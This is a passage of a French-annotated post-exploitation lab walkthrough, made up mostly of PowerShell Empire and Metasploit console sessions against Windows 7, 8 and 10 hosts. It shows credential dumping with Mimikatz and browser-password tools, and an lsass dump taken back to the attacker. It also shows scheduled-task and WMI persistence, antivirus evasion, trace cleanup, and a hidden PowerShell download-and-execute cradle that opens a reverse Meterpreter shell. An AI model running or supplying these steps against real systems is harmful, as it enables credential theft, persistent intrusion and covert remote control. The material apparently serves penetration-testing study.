tspkg :
* Username : hacker01
* Domain : PC-seb-W8
* Password : Pa$$w0rd
wdigest :
* Username : seb
* Domain : PC-seb-W8
* Password : (null)
livessp :
kerberos :
* Username : seb
* Domain : PC-seb-W8
* Password : (null)
ssp :
credman :
[00000000]
* Username : (null)
* Domain : MicrosoftOffice16_Data:SSPI:Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
* Password : Pa$$w0rd
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : PC-seb-W8$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 25/11/0000 21:29:55
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : PC-seb-W8$
* Domain : WORKGROUP
* Password : (null)
livessp :
kerberos :
* Username : pc-seb-w8$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Afficher les Credentials enregistrés
(Empire: W8Elevated) > creds
Credentials:
CredID CredType Domain UserName Host Password
------ -------- ------ -------- ---- --------
1 hash W7Pro-Target stagiaire W7Pro-Target 92937945b518f74341de3f726500d4ff
2 plaintext W7Pro-Target stagiaire W7Pro-Target Pa$$w0rd
3 hash PC-seb-W8 hacker01 PC-seb-W8 e438dcaf859f762fb10844571d880da1
4 plaintext PC-seb-W8 hacker01 PC-seb-W8 Pa$$w0rd
5 plaintext MicrosoftOffice16_Data:SSPI:Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.(null) PC-seb-W8 Pa$$w0rd
(Empire: W8Elevated) >
Afficher les mots de passe enregistrés dans les navigateurs
Attention ! BitDefender Pro détecte un Trojan
(Empire: W8ElevatedSystem) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
W7TargetInitial 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 08:16:17
W7TargetElevated 192.168.10.15 W7PRO-TARGET *W7Pro-Target\stagiapowershell/748 5/0.0 0000-11-26 08:16:17
W8Initial 192.168.10.7 PC-seb-W8 PC-seb-W8\seb powershell/1960 5/0.0 0000-11-26 08:16:17
W8Elevated 192.168.10.7 PC-seb-W8 *PC-seb-W8\seb powershell/11748 5/0.0 0000-11-26 08:16:17
W8ElevatedSystem 192.168.10.7 PC-seb-W8 *WORKGROUP\Syst?me powershell/15080 5/0.0 0000-11-26 08:16:19
(Empire: agents) > interact W8Elevated
(Empire: W8Elevated) > pwd
(Empire: W8Elevated) >
Path
----
C:\windows\system32
(Empire: W8Elevated) > cd \users\seb\appdata\local\temp
(Empire: W8Elevated) >
Path
----
C:\users\seb\appdata\local\temp
(Empire: W8Elevated) > pwd
(Empire: W8Elevated) >
Path
----
C:\users\seb\appdata\local\temp
(Empire: W8Elevated) > upload /root/WebBrowserPassView.exe
(Empire: W8Elevated) > upload /root/WebBrowserPassView.cfg
(Empire: W8Elevated) > shell ./WebBrowserPassView.exe /scomma liste-pwd.txt
(Empire: W8Elevated) >
(Empire: W8Elevated) > download liste-pwd.txt
(Empire: W8Elevated) > [+] Part of file liste-pwd.txt from W8Elevated saved
[*] File download of C:\users\seb\appdata\local\temp\liste-pwd.txt completed
(Empire: W8Elevated) >
Les fichiers téléchargés sont dans Empire/downloads/NomAgent
root@kali:~# cat Desktop/Empire/downloads/W8Elevated/C\:/users/seb/appdata/local/temp/liste-pwd.txt
URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time
http://admin.infomaniak.ch/login.php,Chrome,Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.,Pa$$w0rd,Very Strong,sMailbox,sPassword,28/04/0000 21:57:41,
http://www.4shared.com/,Internet Explorer 10.0,Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.,Pa$$w0rd ,Very Strong,,,,09/11/0000 00:24:36
……………………………………
http://funkysize.forumactif.com/login,Chrome,hacker01,Pa$$w0rd,Very Strong,username,password,13/01/0000 23:22:57,
Il existe d’autres outils non détectés par BitDefender Pro :
ChromePasswordDump.exe
BrowserPasswordDump.exe (tout navigateur)
Se connecter à un agent avec élévation de privilèges dans le contexte de l’utilisateur (pas System)
(Empire: W8Elevated) > pwd
(Empire: W8Elevated) >
Path
----
C:\users\seb\appdata\local\temp
(Empire: W8Elevated) > upload /root/BrowserPasswordDump.exe
(Empire: W8Elevated) > shell ./BrowserPasswordDump.exe
(Empire: W8Elevated) >
****************************************************************
Browser Password Dump v5.0 by SecurityXploded
http://securityxploded.com/browser-password-dump.php
****************************************************************
Browser Username Password Website URL
==============================================================================================================
Google Chrome Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. Pa$$w0rd https://www.facebook.com/login.php
Google Chrome Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. Pa$$w0rd https://login.live.com/ppsecure/post.srf
…
…
…
Internet Explorer Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. Pa$$w0rd https://login.live.com/
Internet Explorer Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. Pa$$w0rd https://www.4shared.com/Cannot close vault. Error (6)
Tip: For more options type BrowserPasswordDump.exe -h
(Empire: W8Elevated) > rm ./BrowserPasswordDump.exe
(Empire: W8Elevated) >
executed rm ./BrowserPasswordDump.exe
(Empire: W8Elevated) >
Procéder de même avec d’autres outils :
Outils pour les comptes de messagerie et réseau
NetworkPasswordDump64.exe
NetworkPasswordDump32.exe
SocialPasswordDump.exe
Rendre l’exploit permanent
(Empire: W7TargetElevated) > usemodule persistence/elevated/schtasks
(Empire: persistence/elevated/schtasks) > set OnLogon True
(Empire: persistence/elevated/schtasks) > set Agent W7TargetElevated
(Empire: persistence/elevated/schtasks) > set Listener Maison-Interne
(Empire: persistence/elevated/schtasks) > info
Name: Invoke-Schtasks
Module: persistence/elevated/schtasks
NeedsAdmin: True
OpsecSafe: False
MinPSVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
Description:
Persist a stager (or script) using schtasks running as
SYSTEM. This has a moderate detection/removal rating.
Options:
Name Required Value Description
---- -------- ------- -----------
DailyTime False 09:00 Daily time to trigger the script
(HH:mm).
OnLogon False True Switch. Trigger script on user logon.
ExtFile False Use an external file for the payload
instead of a stager.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
TaskName True Updater Name to use for the schtask.
IdleTime False User idle time (in minutes) to trigger
script.
ADSPath False Alternate-data-stream location to store
the script code.
Agent True W7TargetElevated Agent to run module on.
Listener False Maison-Interne Listener to use.
RegPath False HKLM:\Software\Microsoft Registry location to store the script
\Network\debug code. Last element is the key name.
Proxy False default Proxy to use for request (default, none,
or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
(Empire: persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/schtasks) >
Opération réussie : la tâche planifiée "Updater" a été créée.
Schtasks persistence established using listener Maison-Interne stored in HKLM:\Software\Microsoft\Network\debug with Updater OnLogon trigger.
(Empire: persistence/elevated/schtasks) >
La tâche planifiée est liée à la clé Debug qui contient le code avant encodage par Powershell
Après réouverture de la session, la tâche planifiée crée un nouvel agent
(Empire: persistence/elevated/schtasks) > [+] Initial agent ASEFKZNHG4ZTN1ET from 192.168.10.7 now active
(Empire: persistence/elevated/schtasks) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
W7TargetInitial 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 08:08:37
W7TargetElevated 192.168.10.15 W7PRO-TARGET *W7Pro-Target\stagiapowershell/748 5/0.0 0000-11-26 08:08:37
W8Initial 192.168.10.7 PC-seb-W8 PC-seb-W8\seb powershell/1960 5/0.0 0000-11-26 08:08:37
W8Elevated 192.168.10.7 PC-seb-W8 *PC-seb-W8\seb powershell/11748 5/0.0 0000-11-26 08:08:37
ASEFKZNHG4ZTN1ET 192.168.10.7 PC-seb-W8 *WORKGROUP\Syst?me powershell/15080 5/0.0 0000-11-26 08:08:37
(Empire: agents) > rename ASEFKZNHG4ZTN1ET W8ElevatedSystem
(Empire: agents) >
(Empire: agents) > interact W8ElevatedSystem
(Empire: W8ElevatedSystem) > getuid
(Empire: W8ElevatedSystem) >
AUTORITE NT\Système
(Empire: W8ElevatedSystem) > shell whoami /all
(Empire: W8ElevatedSystem) >
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
=================== ========
autorite nt\système S-1-5-18
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
================================================ ================= =============================================================== ========================================================
Étiquette obligatoire\Niveau obligatoire système Nom S-1-16-16384
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\SERVICE Groupe bien connu S-1-5-6 Groupe obligatoire, Activé par défaut, Groupe activé
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Utilisateurs authentifiés Groupe bien connu S-1-5-11 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activé par défaut, Groupe activé
NT SERVICE\BDESVC Groupe bien connu S-1-5-80-2962817144-200689703-2266453665-3849882635-1986547430 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\BITS Groupe bien connu S-1-5-80-864916184-135290571-3087830041-1716922880-4237303741 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\CertPropSvc Groupe bien connu S-1-5-80-3256172449-2363790065-3617575471-4144056108-756904704 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\DsmSvc Groupe bien connu S-1-5-80-286057374-2594772386-1471686342-3682429118-820474675 Activé par défaut, Propriétaire du groupe
NT SERVICE\Eaphost Groupe bien connu S-1-5-80-3578261754-285310837-913589462-2834155770-667502746 Activé par défaut, Propriétaire du groupe
NT SERVICE\hkmsvc Groupe bien connu S-1-5-80-1373701630-3910968185-3388013410-2492353-937432973 Activé par défaut, Propriétaire du groupe
NT SERVICE\IKEEXT Groupe bien connu S-1-5-80-698886940-375981264-2691324669-2937073286-3841916615 Activé par défaut, Propriétaire du groupe
NT SERVICE\iphlpsvc Groupe bien connu S-1-5-80-62724632-2456781206-3863850748-1496050881-1042387526 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\LanmanServer Groupe bien connu S-1-5-80-879696042-2351668846-370232824-2524288904-4023536711 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\lfsvc Groupe bien connu S-1-5-80-3704025948-1094794811-1175534343-2088422159-783153058 Activé par défaut, Propriétaire du groupe
NT SERVICE\MMCSS Groupe bien connu S-1-5-80-2799810402-4136494038-1094338311-2889966999-3154753985 Activé par défaut, Propriétaire du groupe
NT SERVICE\MSiSCSI Groupe bien connu S-1-5-80-917953661-2020045820-2727011118-2260243830-4032185929 Activé par défaut, Propriétaire du groupe
NT SERVICE\MsKeyboardFilter Groupe bien connu S-1-5-80-3719317199-3405270365-2794832041-2304024896-2914089004 Activé par défaut, Propriétaire du groupe
NT SERVICE\NcaSvc Groupe bien connu S-1-5-80-154974075-1852685594-3179713959-2755908004-3936262621 Activé par défaut, Propriétaire du groupe
NT SERVICE\RasAuto Groupe bien connu S-1-5-80-1802467488-1541022566-2033325545-854566965-652742428 Activé par défaut, Propriétaire du groupe
NT SERVICE\RasMan Groupe bien connu S-1-5-80-4176366874-305252471-2256717057-2714189771-3552532790 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\RemoteAccess Groupe bien connu S-1-5-80-1954729425-4294152082-187165618-318331177-3831297489 Activé par défaut, Propriétaire du groupe
NT SERVICE\Schedule Groupe bien connu S-1-5-80-4125092361-1567024937-842823819-2091237918-836075745 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\SCPolicySvc Groupe bien connu S-1-5-80-1691538513-4084330536-1620899472-1113280783-3554754292 Activé par défaut, Propriétaire du groupe
NT SERVICE\SENS Groupe bien connu S-1-5-80-4259241309-1822918763-1176128033-1339750638-3428293995 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\SessionEnv Groupe bien connu S-1-5-80-4022436659-1090538466-1613889075-870485073-3428993833 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\SharedAccess Groupe bien connu S-1-5-80-2009329905-444645132-2728249442-922493431-93864177 Activé par défaut, Propriétaire du groupe
NT SERVICE\ShellHWDetection Groupe bien connu S-1-5-80-1690854464-3758363787-3981977099-3843555589-1401248062 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\wercplsupport Groupe bien connu S-1-5-80-3594706986-2537596223-181334840-1741483385-1351671666 Activé par défaut, Propriétaire du groupe
NT SERVICE\Winmgmt Groupe bien connu S-1-5-80-3750560858-172214265-3889451188-1914796615-4100997547 Activé par défaut, Groupe activé, Propriétaire du groupe
NT SERVICE\wlidsvc Groupe bien connu S-1-5-80-2952724807-2252311773-3412998076-2712868122-780978283 Activé par défaut, Propriétaire du groupe
NT SERVICE\wuauserv Groupe bien connu S-1-5-80-1014140700-3308905587-3330345912-272242898-93311788 Activé par défaut, Propriétaire du groupe
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Administrateurs Alias S-1-5-32-544 Activé par défaut, Groupe activé, Propriétaire du groupe
Informations de privilèges----------------------
Nom de privilège Description État
=============================== ========================================================= =========
SeAssignPrimaryTokenPrivilege Remplacer un jeton de niveau processus Désactivé
SeLockMemoryPrivilege Verrouiller les pages en mémoire Activé
SeIncreaseQuotaPrivilege Ajuster les quotas de mémoire pour un processus Désactivé
SeTcbPrivilege Agir en tant que partie du système d'exploitation Activé
SeSecurityPrivilege Gérer le journal d'audit et de sécurité Désactivé
SeTakeOwnershipPrivilege Prendre possession de fichiers ou d'autres objets Désactivé
SeLoadDriverPrivilege Charger et décharger les pilotes de périphériques Désactivé
SeSystemProfilePrivilege Performance système du profil Activé
SeSystemtimePrivilege Modifier l'heure système Désactivé
SeProfileSingleProcessPrivilege Processus unique du profil Activé
SeIncreaseBasePriorityPrivilege Augmenter la priorité de planification Activé
SeCreatePagefilePrivilege Créer un fichier d'échange Activé
SeCreatePermanentPrivilege Créer des objets partagés permanents Activé
SeBackupPrivilege Sauvegarder les fichiers et les répertoires Désactivé
SeRestorePrivilege Restaurer les fichiers et les répertoires Désactivé
SeShutdownPrivilege Arrêter le système Désactivé
SeDebugPrivilege Déboguer les programmes Activé
SeAuditPrivilege Générer des audits de sécurité Activé
SeSystemEnvironmentPrivilege Modifier les valeurs de l'environnement du microprogramme Désactivé
SeChangeNotifyPrivilege Contourner la vérification de parcours Activé
SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Désactivé
SeManageVolumePrivilege Effectuer les tâches de maintenance de volume Désactivé
SeImpersonatePrivilege Emprunter l'identité d'un client après l'authentification Activé
SeCreateGlobalPrivilege Créer des objets globaux Activé
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Activé
SeTimeZonePrivilege Changer le fuseau horaire Activé
SeCreateSymbolicLinkPrivilege Créer des liens symboliques Activé
(Empire: W8ElevatedSystem) >
Interagir avec Metasploit
Lancer une session Metasploit de type webdelivery
root@kali:~/Desktop/Empire# cd
root@kali:~# service postgresql start
root@kali:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.13.1-dev ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
msf exploit(web_delivery) > set SRVHOST 192.168.10.10
SRVHOST => 192.168.10.10
msf exploit(web_delivery) > set SRVPORT 9999
SRVPORT => 9999
msf exploit(web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.10.10 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 9999 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf exploit(web_delivery) > set LHOST 192.168.10.10
LHOST => 192.168.10.10
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.10.10 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 9999 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.10.10 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Using URL: http://192.168.10.10:9999/vaAnBbY
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $U=new-object net.webclient;$U.proxy=[Net.WebRequest]::GetSystemWebProxy();$U.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $U.downloadstring('http://192.168.10.10:9999/vaAnBbY');
Dans Empire, lancer le module Invoke_Metasploitpayload
(Empire: W1002) > usemodule code_execution/invoke_metasploitpayload
(Empire: code_execution/invoke_metasploitpayload) > info
Name: Invoke-MetasploitPayload
Module: code_execution/invoke_metasploitpayload
NeedsAdmin: False
OpsecSafe: True
MinPSVersion: 2
Background: False
OutputExtension: None
Authors:
@jaredhaight
Description:
Spawns a new, hidden PowerShell window that downloadsand
executes a Metasploit payload. This relies on
the exploit/multi/scripts/web_delivery metasploit module.
Options:
Name Required Value Description
---- -------- ------- -----------
URL True URL from the Metasploit web module
Agent True W1002 Agent to run Metasploit payload on.
(Empire: code_execution/invoke_metasploitpayload) > set URL http://192.168.10.10:9999/vaAnBbY
(Empire: code_execution/invoke_metasploitpayload) > execute
(Empire: code_execution/invoke_metasploitpayload) >
error running command: Array ne peut pas être null.
Nom du paramètre : chars
(Empire: code_execution/invoke_metasploitpayload) >
La session metasploit s’établit
[*] 192.168.10.19 web_delivery - Delivering Payload
[*] Sending stage (1189423 bytes) to 192.168.10.19
[*] Meterpreter session 4 opened (192.168.10.10:4444 -> 192.168.10.19:54542) at 0000-12-03 14:39:40 -0500
msfexploit(web_delivery) >
msf exploit(web_delivery) >
msf exploit(web_delivery) >
msf exploit(web_delivery) >
msf exploit(web_delivery) >
msf exploit(web_delivery) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: W10-01\stagiaire
meterpreter > pwd
C:\Windows\system32
Cas particulier de Windows 10 patché au 3/12/0000 et Windows Defender
Mimikatz est détecté par Windows Defender
Avec Windows Defender désactivé, Mimikatz se lance mais ne produit pas de résultat exploitable
Ci-dessous le test d’un script (White-Rabbit.ps1 modifié en White-Rabbit-mod.ps1), provenant du module PowerMemory
- Il exploite les mots de passe en mémoire
- Il ne se lance pas correctement, problème d’interactivité avec des menus qui serait en rapport avec le message d’avertissement de « session Powershell non-interactive ».
- De plus il doit disposer d’une arborescence de ressources (fichiers/scripts) qu’il faut également copier
J’ai modifié le script qui affiche les credentials en mémoire :
- Les choix dans les menus sont fixes (plus d’interactivité)
- L’emplacement des logs a été modifié pour être fixe (dossier du script)
- L’affichage du fichier de log par notepad a été supprimé
On récupère ensuite 2 fichiers :
-
Mise en oeuvre de PowerMemory
Metasploit dispose d’un upload récursif
Upload du répertoire RWMC dans la session Metasploit
meterpreter > cd \
meterpreter > mkdir PM
meterpreter > cd PM
meterpreter > pwd
C:\PM
meterpreter > dir
No entries exist in C:\PM
meterpreter > upload -r /mnt/hgfs/SharedKali/PowerMemory-master/RWMC .
[*] uploading : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/bufferCommand.txt -> .\bufferCommand.txt
[*] uploaded : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/bufferCommand.txt -> .\bufferCommand.txt
[*] mirroring : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/debugger -> .\debugger
[*] mirroring : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/debugger/2r2 -> .\debugger\2r2
…
… / …
…
[*] uploading : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/White-Rabbit.ps1 -> .\White-Rabbit.ps1
[*] uploaded : /mnt/hgfs/SharedKali/PowerMemory-master/RWMC/White-Rabbit.ps1 -> .\White-Rabbit.ps1
meterpreter >
meterpreter >
meterpreter > dir
Listing: C:\PM
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 3692 fil 0000-12-03 14:41:58 -0500 README.md
100666/rw-rw-rw- 12398 fil 0000-12-03 14:42:01 -0500 White-Rabbit-Mod.ps1
100666/rw-rw-rw- 12302 fil 0000-12-03 14:42:01 -0500 White-Rabbit.ps1
100666/rw-rw-rw- 23 fil 0000-12-03 14:41:31 -0500 bufferCommand.txt
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:31 -0500 debugger
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:50 -0500 kernel
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:50 -0500 legacyOS
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:50 -0500 logging
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:55 -0500 misc
100777/rwxrwxrwx 6656 fil 0000-12-03 14:41:58 -0500 msdsc.exe
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:58 -0500 snapshot
40777/rwxrwxrwx 0 dir 0000-12-03 14:41:59 -0500 supportedOS
40777/rwxrwxrwx 0 dir 0000-12-03 14:42:00 -0500 utilities
Lancement du script White-Rabbit-Mod.ps1
(Empire: code_execution/invoke_metasploitpayload) > interact W1002
(Empire: W1002) > pwd
(Empire: W1002) >
Path
----
C:\PM
(Empire: W1002) > dir
(Empire: W1002) >
LastWriteTime length Name
------------- ------ ----
03/12/0000 20:41:31 debugger
03/12/0000 20:41:50 kernel
03/12/0000 20:41:50 legacyOS
03/12/0000 20:41:50 logging
03/12/0000 20:41:55 misc
03/12/0000 20:41:58 snapshot
03/12/0000 20:41:59 supportedOS
03/12/0000 20:42:00 utilities
03/12/0000 20:41:31 23 bufferCommand.txt
03/12/0000 20:41:58 6656 msdsc.exe
03/12/0000 20:41:58 3692 README.md
03/12/0000 20:42:01 12398 White-Rabbit-Mod.ps1
03/12/0000 20:42:01 12302 White-Rabbit.ps1
(Empire: W1002) > shell .\White-Rabbit-Mod.ps1
(Empire: W1002) >
================================================================================================
C:\PM\Log_.log
Récupération des mots de passe
(Empire: W1002) > download Log_.log
(Empire: W1002) > [+] Part of file Log_.log from W1002 saved
[+] Part of file Log_.log from W1002 saved
[*] File download of C:\PM\Log_.log completed
(Empire: W1002) > download lsass.dmp
(Empire: W1002) > [+] Part of file lsass.dmp from W1002 saved
[+] Part of file lsass.dmp from W1002 saved
[+] Part of file lsass.dmp from W1002 saved
[+] Part of file lsass.dmp from W1002 saved
[+] Part of file lsass.dmp from W1002 saved
… / …
[*] File download of C:\PM\lsass.dmp completed
Effacement des traces
(Empire: W1002) > cd \
(Empire: W1002) >
Path
----
C:\
(Empire: W1002) > rm -r PM
(Empire: W1002) >
executed rm -r PM
(Empire: W1002) > dir
(Empire: W1002) >
LastWriteTime length Name
------------- ------ ----
03/12/0000 14:25:49 $Recycle.Bin
03/12/0000 12:46:37 Documents and Settings
16/07/0000 13:47:47 PerfLogs
03/12/0000 15:39:44 Program Files
16/07/0000 13:47:50 Program Files (x86)
03/12/0000 15:39:44 ProgramData
03/12/0000 12:46:37 Recovery
03/12/0000 12:53:46 System Volume Information
03/12/0000 14:25:37 Users
03/12/0000 14:38:52 Windows
16/07/0000 13:43:00 384322 bootmgr
16/07/0000 13:43:00 1 BOOTNXT
03/12/0000 17:46:33 1581 LICENSE
03/12/0000 15:40:53 1207959552 pagefile.sys
03/12/0000 15:40:53 16777216 swapfile.sys
(Empire: W1002) >
Etablir la persistence avec WMI
(Empire: W1002) > usemodule persistence/elevated/wmi
(Empire: persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
MinPSVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener False Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
SubName True Updater Name to use for the event subscription.
Proxy False default Proxy to use for request (default, none,
or other).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
ExtFile False Use an external file for the payload
instead of a stager.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Agent True W1002 Agent to run module on.
(Empire: persistence/elevated/wmi) > set Listener MAISON
(Empire: persistence/elevated/wmi) > set SubName WMIUpdate
(Empire: persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
MinPSVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener False MAISON Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
SubName True WMIUpdate Name to use for the event subscription.
Proxy False default Proxy to use for request (default, none,
or other).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
ExtFile False Use an external file for the payload
instead of a stager.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Agent True W1002 Agent to run module on.
(Empire: persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/wmi) >
WMI persistence established using listener MAISON with OnStartup WMI subsubscription trigger.
(Empire: persistence/elevated/wmi) >
Charger et Exécuter Mimikatz directement en mémoire
Si Mimikatz (ou un autre module) ne veut pas s’exécuter normalement dans Empire, tenter de charger le module InvokeMimikatz.ps1 directement en mémoire
(Empire: agents) > interact W8102H
(Empire: W8102H) > pwd
(Empire: W8102H) >
Path
----
C:\windows\system32
(Empire: W8102H) > cd \
(Empire: W8102H) >
Path
----
C:\
(Empire: W8102H) > scriptimport /mnt/hgfs/SharedKali/PowerSploit/
.gitignore CodeExecution/ LICENSE Persistence/ PowerSploit.psm1 PowerSploit.sln README.md ScriptModification/
AntivirusBypass/ Exfiltration/ Mayhem/ PowerSploit.psd1 PowerSploit.pssproj Privesc/ Recon/ Tests/
(Empire: W8102H) > scriptimport /mnt/hgfs/SharedKali/PowerSploit/Exfiltration/
Exfiltration.psd1 Get-TimedScreenshot.ps1 Invoke-Mimikatz.ps1 NTFSParser/
Exfiltration.psm1 Get-VaultCredential.ps1 Invoke-NinjaCopy.ps1 Out-Minidump.ps1
Get-GPPPassword.ps1 Get-VaultCredential.ps1xml Invoke-TokenManipulation.ps1 Usage.md
Get-Keystrokes.ps1 Invoke-CredentialInjection.ps1 LogonUser/ VolumeShadowCopyTools.ps1
(Empire: W8102H) > scriptimport /mnt/hgfs/SharedKali/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
(Empire: W8102H) >
script successfully saved in memory
(Empire: W8102H) > scriptcmd Invoke-Mimikatz -dumpcreds
(Empire: W8102H) >
Job started: Debug32_zuujf
